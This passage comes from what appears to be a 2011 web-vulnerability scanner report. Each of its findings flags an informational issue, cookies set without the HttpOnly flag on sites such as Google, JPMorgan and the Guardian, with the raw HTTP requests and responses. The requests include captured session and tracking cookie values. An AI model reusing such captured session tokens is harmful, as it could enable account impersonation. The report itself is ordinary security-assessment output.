Connection: close
Content-Type: text/html
Content-Length: 9667

<!DOCTYPE html>
<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="description" content="At Filament Group, we build elegant communications and interacti
...[SNIP]...

11.591. http://www.firstusa.com/xcards4/common/weblinking/weblinking.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstusa.com
Path:   /xcards4/common/weblinking/weblinking.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xcards4/common/weblinking/weblinking.html HTTP/1.1
Host: www.firstusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:06:46 GMT
Content-length: 5936
Content-type: text/html
Set-Cookie: v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com
Last-modified: Thu, 16 Dec 2010 13:58:38 GMT
Etag: "1730-4d0a1b0e"
Accept-ranges: bytes
Connection: close

<html><head><title>Important Information on Weblinking from Chase</title>
<link href="http://www.bankone.com/bolStyle.css" rel="stylesheet" type="text/css">
<SCRIPT Language="javascript" TYPE="text/j
...[SNIP]...

11.592. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 03 Feb 2011 01:11:52 GMT
Expires: Thu, 03 Feb 2011 01:11:52 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

11.593. http://www.google.com/setprefs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /setprefs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dipboard%2Bsoftware HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ipboard+software
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1296695282:GM=1:SG=2:S=srN-EBSZQitQMjet; expires=Sat, 02-Feb-2013 01:08:02 GMT; path=/; domain=.google.com
Date: Thu, 03 Feb 2011 01:08:02 GMT
Server: gws
Content-Length: 277
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/search?sou
...[SNIP]...

11.594. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=-qUnohNObFQ;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 01:15:42 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

11.595. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=DLDUrVQYtAM;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 01:15:45 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

11.596. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /business/2011/jan/11/offshore-oil-industry-white-house

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/2011/jan/11/offshore-oil-industry-white-house HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:15:50 GMT
Server: Apache
X-GU-jas: 07-16121
X-GU-PageRenderer: DefaultPageRenderer
Content-Language: en
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_MU=VFVvQnhRcjZERHdBQUNoYlFSUUFBQUJafEkxMytueWM9; path=/; domain=.guardian.co.uk; expires=Sun, 31-Jan-2021 01:15:49 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6dHg6NDpkYWxsYXM6Mzo2MjM6YnJvYWRiYW5kOiAzMi43ODc6LTk2Ljc5OUA0NzI1NDI3MTgzMTgzMjE1MjMzMTk3MTM1OTcyNjIyMTAxNzUyOQ==; path=/; domain=.guardian.co.uk; expires=Thu, 24-Feb-2011 01:15:49 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 03
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Length: 98316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l
...[SNIP]...

11.597. http://www.ibsnetaccess.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibsnetaccess.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ibsnetaccess.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:58 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; Path=/; Domain=.ibsnetaccess.com
Set-Cookie: TLTUID=C697A0BA2F17102F003A8D446414B7D1; Path=/; Domain=.ibsnetaccess.com; Expires=Wed, 02-02-2021 21:59:58 GMT
Last-Modified: Tue, 30 Mar 2010 00:12:24 GMT
ETag: "8e2008-294-7be64a00"
Accept-Ranges: bytes
Content-Length: 660
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>FIA Card Services Net Access</TITLE>
<META NAME = "Keywords" CONTENT = "FIA Card Services, FIA card services, net access, FIA Card Services Net Access, FIA card services
...[SNIP]...

11.598. http://www.jpmorgan.com/css/lightview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /css/lightview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/lightview.css HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:44 GMT
Server: Apache
Last-Modified: Wed, 04 Aug 2010 00:40:29 GMT
ETag: "8e70c-2560-ae2df940"
Accept-Ranges: bytes
Content-Length: 9568
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/css

/* lightview.css
http://www.nickstakenburg.com/projects/lightview
*/

#lightview {
   position: absolute;
   top: 50%;
   left: 50%;
   height: 150px;
   width: 150px;
   margin: -75px 0 0 -75px;
   padding: 0;

...[SNIP]...

11.599. http://www.jpmorgan.com/emetrics/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /emetrics/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /emetrics/s_code.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Fri, 12 Nov 2010 20:44:49 GMT
ETag: "188c2-9b4f-29579240"
Accept-Ranges: bytes
Content-Length: 39759
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved. More info available at
http://www.omniture.com */
/* Report suite for J.P. Morgan site */

/* #################
...[SNIP]...

11.600. http://www.jpmorgan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:24 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 20:30:58 GMT
ETag: "47c5-37e-d94d8480"
Accept-Ranges: bytes
Content-Length: 894
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/plain

..............h.......(....... ................................ 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6
...[SNIP]...

11.601. http://www.jpmorgan.com/images/bkgrd_container_2008.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/bkgrd_container_2008.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bkgrd_container_2008.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Fri, 08 Aug 2008 13:36:34 GMT
ETag: "72aba-5958-e4e13c80"
Accept-Ranges: bytes
Content-Length: 22872
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

...............................................................b..
...[SNIP]...

11.602. http://www.jpmorgan.com/images/client_pixel.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/client_pixel.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/client_pixel.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:50:44 GMT
ETag: "72abb-156-1dceb500"
Accept-Ranges: bytes
Content-Length: 342
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................^....
...[SNIP]...

11.603. http://www.jpmorgan.com/images/dotted_line.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/dotted_line.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dotted_line.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Thu, 07 Aug 2008 20:48:02 GMT
ETag: "72ac1-469-ce156480"
Accept-Ranges: bytes
Content-Length: 1129
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

11.604. http://www.jpmorgan.com/images/headers/hdr_client_logon_2008.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/headers/hdr_client_logon_2008.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headers/hdr_client_logon_2008.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:16 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
ETag: "6617e-548-9a51d180"
Accept-Ranges: bytes
Content-Length: 1352
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................
.T..
...[SNIP]...

11.605. http://www.jpmorgan.com/images/headers/hdr_news.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/headers/hdr_news.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headers/hdr_news.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
ETag: "6617d-9cb-9a51d180"
Accept-Ranges: bytes
Content-Length: 2507
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

..................................................................
...[SNIP]...

11.606. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_corporations.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/home_corporations.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_corporations.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
ETag: "32aa92-1918-5d889a40"
Accept-Ranges: bytes
Content-Length: 6424
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ............................................................x.."..............................
...[SNIP]...

11.607. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_fininst.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/homepage/2008_flash/img/home_fininst.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_fininst.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
